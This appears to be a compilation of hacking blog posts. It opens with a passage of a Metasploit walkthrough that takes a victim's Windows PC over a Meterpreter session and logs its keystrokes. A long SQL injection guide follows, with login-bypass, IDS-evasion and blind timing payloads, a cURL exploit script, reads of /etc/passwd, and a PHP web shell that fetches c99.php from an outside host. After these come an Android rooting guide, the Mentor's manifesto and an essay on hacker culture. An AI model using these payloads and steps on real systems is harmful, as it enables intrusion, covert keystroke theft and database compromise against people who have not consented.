The last step you have to do now, is to type in “exploit” and press enter,

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444

[*] Starting the payload handler...

Now, the payload is listening for all the incoming connections on port 444.

[*] Sending stage (749056 bytes) to 192.168.255.1

[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this

meterpreter >

Type in ps to list the active processes

meterpreter > ps

Search for explorer.exe and migrate to the process

meterpreter > migrate 5716

[*] Migrating to 5716...

[*] Migration completed successfully.

meterpreter >

Type in the following:

meterpreter > use priv

Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,

Jus type shell

meterpreter > shell

Process 5428 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7600]

C:\Windows\system32>

You would now be having a command prompt,

Type in whoami, to see the computer’s name of victim :

C:\Windows\system32>whoami

whoami

win7-pc\win 7

C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.

Type in:

Let’s say the victim has typed in anything on his computer.

Just type exit, to return to meterpreter.

Now type in keyscan_dump, to see all the typed keystrokes :

meterpreter > keyscan_dump

Dumping captured keystrokes...

GaM3 0V3R

P.S.: The above information is just for educational purposes only. You should test it against the computer you own.

About Author : This is a written by Mr. Muhammad Ali. He is a Cyber Security Expert and a security researcher. His main expertise include Privacy Issues online, Web Application Security and Wireless Hacking.

here

SQL injection

2013-07-20T08:23:00.001-07:00

SQL Injection

SQL Injection is one of the more popular application layer hacking techniques that is used in the wild today. It is a trick that exploits poorly filtered or not correctly escaped SQL queries into parsing variable data from user input. The idea behind SQL injection is to convince the SQL application (whether MySQL, MSSQL, PostgreSQL, ORACLE etc) to run an SQL string that was not premeditated.

'''SQL Injection''' is one of the more popular application layer hacking techniques that is used in the wild today. It is a trick that exploits poorly filtered or not correctly escaped SQL queries into parsing variable data from user input. The idea behind SQL injection is to convince the SQL application (whether MySQL, MSSQL, PostgreSQL, ORACLE etc) to run an SQL string that was not premeditated.

==Severity==

Relatively High

==Exploit Likeliness==

Moderate

==SQL Injection Types==

There are a number of categorized SQL injection types that can be executed with a web-browser. They are:

* Poorly Filtered Strings

* Incorrect Type Handling

* Signature Evasion

* Filter Bypassing

* Blind SQL Injection

===Poorly Filtered Strings===

SQL injections based on poorly filtered strings are caused by user input that is not filtered for escape characters. This means that a user can input a variable that can be passed on as an SQL statement, resulting in database input manipulation by the end user.

Code that is vulnerable to this type of vulnerability might look something like this:

$pass = $_GET['pass'];

$password = mysql_query("SELECT password FROM users WHERE password = '". $pass . "';");

</source>

The query above is an SQL call to SELECT the password from the users database, with the password value being that of $var. If the user were to input a password that was especially designed to continue the SQL call, it may result in results that were not aforethought. An injection for this may look something like:

' OR 1 = 1 /*

</source>

Inserting the above into the form will result in the query being extended with an OR statement, resulting in a final query of:

SELECT password FROM users WHERE password = '' OR 1 = 1 /*

</source>

Because of the OR statement in the SQL query, the check for password = $var is insignificant as 1 does equal 1, thus the query will return TRUE, resulting in a positive login.

===Incorrect Type Handling===

Incorrect type handling based SQL injections occur when an input is not checked for type constraints. An example of this would be an ID field that is numeric, but there is no filtering in place to check that the user input is numeric. is_numeric() should always be used when the field type is explicitly supposed to be a number. An example of code that will not be subject to incorrect type handling injection is:

(is_numeric($_GET['id'])) ? $id = $_GET['id'] : $id = 1;

$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );

</source>

The above code checks that $_GET['id'] is a number, if TRUE returns $id = $_GET['id'], and if FALSE sets $id to 1. This kind of filtering will assure that the ID field is always numeric.

===Signature Evasion===

Many SQL injections will be ''somewhat'' blocked by intrusion detection and intrusion prevention systems using signature detection rules. Common programs that detect SQL injections are mod_security for Apache and Snort. These programs aren't fool proof and as such, the signatures can be evaded. There are many methods that can be used to bypass signature detection, some of which will be described here.

====Different Encoding====

Signature evasion can be made possible with a number of encoding tricks.

One basic and common encoding trick is the use of URL encoding. URL encoding would change an injection string that would normally look like the following:

To a URL encoded string that would be masked as:

Thus the installed IDS system may not register the attack, and the signature will be evaded.

====White Space Multiplicity====

As common signature databases check for strings such as "OR " (OR followed by a space), it is possible to evade these signatures using different spacing techniques. These techniques can be the use of tabs, new lines/carriage return line feeds, and a variety of other white spaces.

If a signature is checking for OR followed by a space, it is possible to insert a new line as a space, which would be possible using the %0a value within a URL bar. Thus an injection that would normally look like:

<source lang="mysql">NULL OR 'value'='value'/*</source>

The whitespace within the injection would be replaced by a new line, looking like:

<source lang="mysql">NULL%0aOR%0a'value'='value'/*</source>

Would now appear to the server as:

<source lang="mysql">NULL

'value'='value'/*</source>

The above string would then bypass the intrusion detection/prevention system and be executed within the MySQL server.

====Arbitrary String Patterns====

In MySQL, comments can be inserted into a query using the C syntax of /* to start the comment, and */ to end the comment. These comment strings can be used to evade signature detection of common words such as UNION, or OR. The following injection pattern may be picked up by an IDS:

NULL UNION ALL SELECT user,pass, FROM user_db WHERE user LIKE '%admin%/*

</source>

However, the same IDS may not detect the injection if keywords were commented as follows:

NULL/**/UNION/**/ALL/**/SELECT/**/user,pass,/**/FROM/**/user_db/**/WHERE/**/uid/**/=/*evade*/'1'//

</source>

The above breaks up keywords that an IPS such as Apache's mod_security would normally detect, allow the SQL injection attack to parse, and database tables to be read. Of course, an IDS will be able to check for strings of /* and */, however, a lot of sites, including blogging sites, pastebins, news sites etc may need to use C commenting blocks, resulting in a false positive.

===Filter Bypassing===

====addslashes() & magic_quotes_gpc====

In rare cases under certain conditions, filters such as addslashes() and magic_quotes_gpc can be bypassed when the vulnerable SQL server is using certain character sets such as the GBK character set.

In GBK, the hex value of 0xbf27 is not a valid multi-byte character, however, the hex value of 0xbf5c is. If the characters are constructed as single-byte characters, 0xbf5c is 0xbf (¿) followed by 0x5c (\); ¿\. And 0xbf27 is 0x27 (') following a 0xbf (¿); ¿'.

This comes in handy when single quotes are escaped with a backslash (\) using addslashes() or when magic_quotes_gpc is turned on. Although it appears at first that the injection point is blocked via one of these methods, we can bypass this by using 0xbf27. By injecting this hex code, addslashes() will modify 0xbf27 to become 0xbf5c27, which is a valid multi-byte character (0xbf5c) and is followed by an non-escaped inverted comma. In other words, 0xbf5c is recognised as a single character, so the backslash is useless, and the quote is not escaped.

Although the use of addslashes() or magic_quotes_gpc would normally be considered as somewhat secure, the use of GBK would render them near useless. The following PHP cURL script would be able to make use of the injection:

<?php

$url = "http://www.victimsite.com/login.php";

$ref = "http://www.victimsite.com/index.php";

$session = "PHPSESSID=abcdef01234567890abcdef01";

$ch = curl_init();

curl_setopt( $ch, CURLOPT_URL, $url );

curl_setopt( $ch, CURLOPT_REFERER, $ref );

curl_setopt( $ch, CURLOPT_RETURNTRANSFER, TRUE );

curl_setopt( $ch, CURLOPT_COOKIE, $session );

curl_setopt( $ch, CURLOPT_POST, TRUE );

curl_setopt( $ch, CURLOPT_POSTFIELDS, "username=" .

chr(0xbf) . chr(0x27) .

"OR 1=1/*&submit=1" );

$data = curl_exec( $ch );

print( $data );

curl_close( $ch );

</source>

The CURLOPT_POSTFIELDS line sets the characters to be passed as multi-byte characters, and finishes the statement with OR 1=1/*, thus creating an injection that will bypass the addslashes() and/or magic_quotes_gpc checking.

====mysql_real_escape_string()====

===Blind SQL Injection===

Most good production environments do not allow you to see output in the form of error messages or extracted database fields whilst conducting SQL injections, these injections are known as '''Blind SQL Injections'''. They are titled ''Partially Blind Injections'' and ''Totally Blind Injections''.

''Partially Blind Injections'' are injections where you can see slight changes in the resulting page, for instance, an unsuccessful injection may redirect the attacker to the main page, where a successful injection will return a blank page.

''Totally Blind Injections'' are unlike Partially Blind Injections in that they don't produce difference in output of any kind. This is still however injectable, though it's harder to determine whether an injection is actually taking place ([[Black Box Testing]] will be useless in these cases, only [[White Box Testing]] and [[Grey Box Testing]] will have any use in Blind SQL Injections).

====MySQL BENCHMARK====

Using MySQL's BENCHMARK will enable an attacker to determine whether an injection point is vulnerable or not. The BENCHMARK technique is basically abusing the function and if one isn't careful, can and will overload the server. However, as MySQL has no delay functions, injecting a string using BENCHMARK that will take 30 seconds to complete is a sure way of ascertaining data that would normally be hard to acquire in a Blind Injection with MySQL.

UNION ALL SELECT BENCHMARK(10000000,ENCODE('xyz','987'));

/*the above will take about 5 seconds on localhost*/

UNION ALL SELECT BENCHMARK(1000000,MD5(CHAR(118)))

/*the above will take about 7 seconds on localhost*/

UNION ALL SELECT BENCHMARK(5000000,MD5(CHAR(118)))

/*the above will take about 35 seconds on localhost*/

</source>

Once the above determines whether or not the injection point is vulnerable, it is possible to use IF statements to determine table names, and field values as such:

UNION ALL SELECT IF( username = 'admin', BENCHMARK(1000000,MD5(CHAR(118))),NULL) FROM users/*

</source>

The above will check for the username of admin and set a delay if the query returns true.

====MSSQL WAITFOR DELAY====

MSSQL's WAITFOR DELAY function allows an injection that is not CPU intensive, and will not overload the server. This technique is much safer than MySQL's BENCHMARK technique. It is possible to use the WAITFOR DELAY function in an injection to stall the server and determine whether an injection point is vulnerable or not.

WAITFOR DELAY '0:0:10'--

/* The above will set a delay of 10 seconds */

WAITFOR DELAY '0:0:0.5'--

/* It is also possible to use fractions, however,

in a blind injection fractions aren't very useful*/

</source>

The above are examples of the WAITFOR DELAY syntax. A real life injection may look more like the following:

; IF EXISTS(SELECT * FROM user_db) WAITFOR DELAY '0:0:10'--

</source>

The above will enable us to determine whether the database “user_db” exists or not.

====PostgreSQL pg_sleep()====

Like MSSQL, PostgreSQL has a non CPU intensive function that allows an attacker to determine whether or not an injection point is vulnerable or not. This function is pg_sleep(). pg_sleep() can be set to determine how many seconds the server will sleep for. The following demonstrates the use of pg_sleep() to sleep for 10 seconds:

SELECT pg_sleep(10);

</source>

==SQL Injection Techniques==

===UNION Statements===

The ''UNION'' statement in SQL is used to select information from two SQL tables. When using the UNION command all selected columns need to be of the same data type. The UNION ALL statement however, allows columns of all data types to be selected.

The ''UNION ALL'' statement can be used as an ''SQL Injection'' vector where an unsanitized dynamic script calls for data from a table such as news, and the UNION ALL statement is used modify and expand the SQL call. A script vulnerable to this type of injection may have a URI string that looks a little something like ./news.php?id=1338, and it's source may look similar to this:

$id = $_GET['id'];

$news = mysql_query( "SELECT * FROM `news` WHERE `id` = $id ORDER BY `id` DESC LIMIT 0,3" );

</source>

Due to the lack of filtering in $id variable, it is vulnerable to an SQL injection, including a UNION ALL injection such as:

NULL UNION ALL SELECT password FROM users WHERE username = 'admin'/*

</source>

The above would result in the following SQL query:

SELECT * FROM `news` WHERE `id` = NULL UNION ALL SELECT password FROM users WHERE username = 'admin'/*

</source>

This would result in a NULL value being called instead of the news ID, and the password of the account named 'admin' being echoed in it's place.

===ORDER BY Statements===

Using the ''ORDER BY'' SQL statement within an SQL injection allows an attacker to determine the number of columns within a query. It sorts the column number called within the statement in an ascending order. An ORDER BY injection would look like the following:

ORDER BY 5/*

</source>

By ordering by the integer 4, the SQL call is ordering by the 5th column called within the statement. Said statement may look like:

$news = mysql_query( "SELECT title,date,time,author,body FROM `news` WHERE `id` = $id" );

</source>

The above query has 5 columns, which would result in the injection resulting as TRUE and ordering the columns by the author name. If the ORDER BY statement was increased to 6 however, the page would return either an error, or another page such as a redirected or blank page. With that said, it is then apparent that the amount of columns called within the query is 5.

The final call of the above SQL query would result in:

SELECT title,date,time,author,body FROM `news` WHERE `id` = $id ORDER BY 5

</source>

===LOAD_FILE()===

The LOAD_FILE() function within MySQL is used to read and return the contents of a file located within the MySQL server. The file being read by LOAD_FILE() must have read rights by all users on the server, not just the server daemon. In order for a LOAD_FILE() injection to be successful, the absolute path of the file must be used, the use of a relative path will fail. To obtain an absolute path, see the article on [[Full Path Disclosure]].

An LOAD_FILE() injection may look like:

NULL UNION ALL SELECT LOAD_FILE('/etc/passwd')/*

</source>

If successful, the injection will display the contents of the passwd file.

===INTO OUTFILE()===

The OUTFILE() function within MySQL is often used to run a query, and dump the results into a file. An attacker could exploit this ability by including a PHP system call into an injection, and write the query into an outfile. In order for a OUTFILE() injection to be successful, the absolute path of the file must be used, the use of a relative path will fail. The directory also needs to be writable. To obtain an absolute path, see the article on [[Full Path Disclosure]].

An INTO OUTFILE() injection may look like:

NULL UNION ALL SELECT null,null,null,null,'<?php system($_GET["command"]); ?>' INTO OUTFILE '/var/www/victim.com/shell.php'/*

</source>

If successful, it will then be possible to run system commands via the $_GET global. The following is an example of using wget to get a file:

<pre>

http://www.victim.com/shell.php?command=wget http://www.example.com/c99.php

</pre>

===INFORMATION_SCHEMA===

The MySQL INFORMATION_SCHEMA database (available from MySQL 5), is made up of table-like objects (aka, system views), that result in the exposure of metadata in a relational format. The execution of arbitrary injections via SELECT statements are thus possible to retrieve or to format said metadata. Metadata is only accessible to an attacker if the objects retrieved are accessible by the current user account. The INFORMATION_SCHEMA database is automatically created by the server upon MySQL installation, and the metadata within is maintained by the server.

The INFORMATION_SCHEMA database is made up of the following objects:

<pre>SCHEMATA

TABLES

COLUMNS

STATISTICS

USER_PRIVILEGES

SCHEMA_PRIVILEGES

TABLE_PRIVILEGES

COLUMN_PRIVILEGES

CHARACTER_SETS

COLLATIONS

COLLATION_CHARACTER_SET_APPLICABILITY

TABLE_CONSTRAINTS

KEY_COLUMN_USAGE

ROUTINES

VIEWS

TRIGGERS

PROFILING

</pre>

An injection exploiting the INFORMATION_SCHEMA database may look like the following:

UNION ALL SELECT * FROM INFORMATION_SCHEMA.TABLES/*

</source>

The above statement would result in the output of all database tables accessible by the current MySQL user.

In the case that the above SELECT statement returns false, it is possible to extend the statement to circumvent any restrictions.

An extended INFORMATION_SCHEMA statement may appear as follows:

SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 'db_name' [AND table_name LIKE 'wild']

SHOW TABLES FROM db_name [LIKE 'wild']

</source>

===Char()===

The Char() function interprets each value as an integer and returns a string based on given the characters by the code values of those integers. With Char(), NULL values are skipped. The function is used within Microsoft SQL Server, Sybase, and MySQL, while CHR() is used by RDBMSs.

SQL's Char() function comes in handy when (for example) addslashes() for PHP is used as a precautionary measure within the SQL query. Using Char() removes the need of quotation marks within the injected query.

An example of some PHP code vulnerable to an SQL injection using Char() would look similar to the following:

$uname = addslashes( $_GET['id'] );

$query = 'SELECT username FROM users WHERE id = ' . $id;

</source>

While addslashes() has been used, the script fails properly sanitize the input as there is no trailing quotation mark. This could be exploited using the following SQL injection string to load the /etc/passwd file:

NULL UNION ALL SELECT LOAD_FILE(CHAR(34,47,101,116,99,47,112,97,115,115,119,100,34))/*

</source>

It could also be used to force the application to allow LIKE statements to search for users like %admin%, as follows:

NULL UNION ALL SELECT username,password,null,null FROM users WHERE username LIKE CHAR(34,37,97,100,109,105,110,37,34)/*

</source>

The syntax of the Char() function changes slightly when dealing with Microsoft SQL Server. For instance, the example given above would translate to the following:

NULL UNION ALL SELECT username,password,null,null FROM users WHERE username LIKE

CHAR(34) + CHAR(37) + CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110) + CHAR(37) + CHAR(34)/*

</source>

===CAST()===

Occasionally it may be necessary to change the data type of the variables in an injection to execute it without type mismatch errors. From time to time dynamic pages may be encountered that will only display certain types of data (strings, integers, dates etc) in certain positions. The CAST function can be used to bypass this and to convert data so that it can be displayed. Take the following example:

NULL UNION ALL SELECT 1,2,3,4,5/*

</source>

The column at position 3 may only be allowed to display a string. It may be necessary to either enclose the 3 in inverted commas or to use the CAST function like the following example:

NULL UNION ALL SELECT 1,2,CAST(3 as nvarchar),4,5/*

</source>

This would still display a 3, but the server would treat it as a string and not an integer. There are numerous data types you can convert to including int, nvarchar, datetime and sql_variant to name just a few.

===LIMIT===

The MySQL LIMIT function is extremely useful. Some web pages don't always display lists of information but rather one record from the database. When this is the case, it will be necessary to form an injection that can display one record from a data set but still enable the retrieval of all records. The LIMIT function has the following syntax:

LIMIT 0,1

</source>

In the example above, LIMIT is given the parameters 0 and 1. The 0 represents the position within the data set and the 1 represents the number of records to retrieve. This example would retrieve the first record within the data set. The following would display the first 10 records:

LIMIT 0,10

</source>

To demonstrate how this would be useful, take the following injection:

NULL UNION ALL SELECT username, password, 3, 4 FROM users LIMIT 0,1

</source>

On a page that returns a single record, this would return the first record in the users table. Incrementing the start position, the 0, would return the 2nd record, 3rd record and so on until the end of the data set is reached.

On a Microsoft SQL Server there is no LIMIT function. However it is possible, albeit much more complex, to accomplish the same outcome with the use of the TOP command and a sub-query.

To illustrate the use of this technique, consider the example above which would translate to the following:

NULL UNION ALL SELECT TOP 1 username, password, 3, 4 FROM users WHERE username NOT IN (SELECT TOP 0 username FROM users)

</source>

Now this is a complex query and the sub query is the key component here. Essentially it tells the database to return the first record that isn't found within the sub query. This only works effectively when there's a unique field to compare against, usually id or username fields.

The query above tells the database to retrieve, in this case, the first record from the users table. The TOP 0 in the sub query is essentially the same as the 0 in the LIMIT example provided earlier, and the TOP 1 in the main query would translate to the 1 in that same example. To return the next record simply increment the 0.

===Information Gathering Techniques===

There are a number of information gathering techniques within SQL. These can be used for reconnaissance purposes to gather any needed information about the victim site.

'''@@version'''

@@version is used within SQL Server to discover which version of the server is running. An injection may look something like:

;SELECT @@VERSION--

</source>

The output of the above statement would look similar to the following:

<pre>

Microsoft SQL Server 7.00 - 7.00.623 (Intel X86)

Nov 27 1998 22:20:07

Desktop Edition on Windows NT 5.1 (Build 2600: )

</pre>

==SQL Injection Mitigation==

There are a number of ways to prevent MySQL injections within PHP. The most common ways are using functions such as addslashes() and mysql_real_escape_string().

===addslashes()===

addslashes() will return a string with a backslash before characters that need to be sanitized in database queries. These characters are single quotes (' = \') double quotes (" = \") and the nullbyte ( = \0).

addslashes() will only work if the query string is wrapped in quotes. A string such as the following would still be vulnerable to an SQL injection:

$id = addslashes( $_GET['id'] );

$query = 'SELECT username FROM users WHERE id = ' . $id;

</source>

However, if the script looked something like the following, addslashes() would prevent an SQL injection:

$uname = addslashes( $_GET['id'] );

$query = 'SELECT username FROM users WHERE id = "' . $uname . '";

</source>

===mysql_real_escape_string()===

mysql_real_escape_string() is a little bit more powerful than addslashes() as it calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " and \x1a.

As with addslashes(), mysql_real_escape_string() will only work if the query string is wrapped in quotes. A string such as the following would still be vulnerable to an SQL injection:

$uname = mysql_real_escape_string( $_GET['id'] );

$query = 'SELECT username FROM users WHERE id = ' . $uname;

</source>

However, if the script looked something like the following, mysql_real_escape_string() would prevent an SQL injection:

$uname = mysql_real_escape_string( $_GET['id'] );

$query = 'SELECT username FROM users WHERE id = "' . $uname . '";

</source>

===is_numeric()===

PHP's is_numeric() function can be used to check if a query is numeric or not, and return TRUE or FALSE. This function can be used to prevent SQL injections where the $id integer is called. The following is an example of the use of is_numeric() to prevent SQL injection:

$id = $_GET['id'];

( is_numeric( $id ) ? TRUE : FALSE );

</source>

===sprintf()===

sprintf() can be used with conversion specifications to ensure that the dynamic argument is treated the way it's suppose to be treated. For example, if a call for the users ID number were in the string, %d would be used to ensure the argument is treated as an integer, and presented as a (signed) decimal number. An example of this is as follows:

$id = $_GET['id'];

$query = sprintf("SELECT username FROM users WHERE id = '%d' ", $id);

</source>

===htmlentities($var, ENT_QUOTES)===

htmlentities() in conjunction with the optional second ''quote_style'' parameter, allows the use of ''ENT_QUOTES'', which will convert both double and single quotes. This will work in the same sense as addslashes() and mysql_real_escape_string() in regards to quotation marks, however, instead of prepending a backslash, it will use the HTML entity of the quotation mark.

In addition to using ENT_QUOTES within htmlentities(), a third parameter can be set which forces the use of a character set within conversion. This will help stop unpredicted results from using multibyte characters in character sets such as BIG5 and GPK.

The following is an example of code which would help to prevent SQL injection in PHP.

$id = $_GET['id'];

$id = htmlentities( $id, ENT_QUOTES, 'UTF-8' );

$query = 'SELECT username FROM users WHERE id = "' . $id . '"';

</source>

And thats called sql injection

How To Root Any Android Manually

2013-07-20T00:50:00.000-07:00

How To Root Any Android Manually
Hello there I am more Of an android person I know a lot about android if you need help with it may it be hard or easy ask me. I will post a lot of stuff about starting from how to root it to creating apps and custom roms.

So today I will show you how to root an android.

What is Root?
Well basically rooting an android phone gives you full control over your phone and allows you to tamper with it as much as you want.

Warning!
Rooting an android phone may and will void your warranty. We are not responsible for any damages that may happen to your phone even though this is a very safe and easy method as long as you follow whats written.

Whats so great about this method:
This method is relatively easy and allows you to root almost any android phone as long as its 1.5 or higher and does not have much risk and also does not require any software.

What will you need!
You wont need any software or any thing that is too big to download you will need the following:

1.An Android phone that is 1.5 or higher.
2.A USB Cable.
3.A Computer.
4. Appropriate drivers for your device. You can find them in the CD that came with the phone or online from the manufacturers website or Google.
5.Android SDK/ADB from here. (Its a high file probably 500 MB you can skip it and download the next file but if you want to develop android apps and stuff download it.)
6.Android SDK files you need from here (download it if you skipped no.5).
7.SuperSu files you need from here.

What you will do:

Part 1:
Just extract what you have downloaded and copy everything from "SuperUserFiles" to "Android-SDK-tools".

For those who have downloaded SDK just install it and use the file in no.5 i will explain SDK in the next post.

Part2:
Go to your android and put it into Android Debugging Mode and if you don't what that is then you should not be here.

For GingerBread User's it is usually in

Settings --> Applications --> Development --> USB Debugging

And For ICS And JellyBean it is in

Settings --> Applications --> Seveloper Options --> USB Debugging

Part3:

Now go to "SuperUserFiles" folder and press Shift+Right Click then click on "Open Command Prompt here.

Part4:

Be sure to run these commands exactly as they are written. The commands with an "$" or "#" will only run after the "adb shell" command. After writing "adb devices" your device id should be shown.

adb devices
adb push psneuter /data/local/tmp
adb shell
$ cd /data/local/tmp
$ chmod 777 psneuter
$ ./psneuter

At this point, the exploit will run and close the shell. You will need to run these commands to restart the ADB server.

adb kill-server
adb devices

It all depends on the next command. Use the

adb shell

command to open a shell. If you see a "#" sign, you have root access, so go ahead and continue to the next part of this tutorial. If not, you can go back and try the previous steps again, or ask for help in the comments.

We now need to make this root permanent. From the root shell you just opened, type the following commands.

# mount -o remount,rw -t rfs /dev/block/st19 /system
# exit
adb push busybox /system/bin
adb push su /system/bin
adb install Superuser.apk
adb shell
# chmod 4755 /system/bin/busybox
# chmod 4755 /system/bin/su
# mount -o remount,ro -t rfs /dev/block/st19 /system
# exit
adb reboot

Now your device should reboot now and you should have SuperUser app in icon drawer, you should now use a root only app such as Root Checker.

If you have Any problems tell me in the comments and if you want me to help you in another problem may it be related to android or anything else tell me in the comments and I will surely reply.

By M.Seljuk Khan who should have been too lazy to write this and does not take any credit for the files used.

The hacker menifesto

2013-07-18T04:12:00.001-07:00

A sort of poem-like paragraph from which I get inspiration

\/\The Conscience of a Hacker/\/

by

+++The Mentor+++

Written on January 8, 1986

=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=

Another one got caught today, it's all over the papers. "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me...

Or feels threatened by me...

Or thinks I'm a smart ass...

Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found.

"This is it... this is where I belong..."

I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals.

We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals.

You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

Hacking history / FAQ

2013-07-18T02:02:00.000-07:00

HACKING FAQ and History

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.
2. No problem should ever have to be solved twice.
3. Boredom and drudgery are evil.
4. Freedom is good.
5. Attitude is no substitute for competence.
Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.
So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.

(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

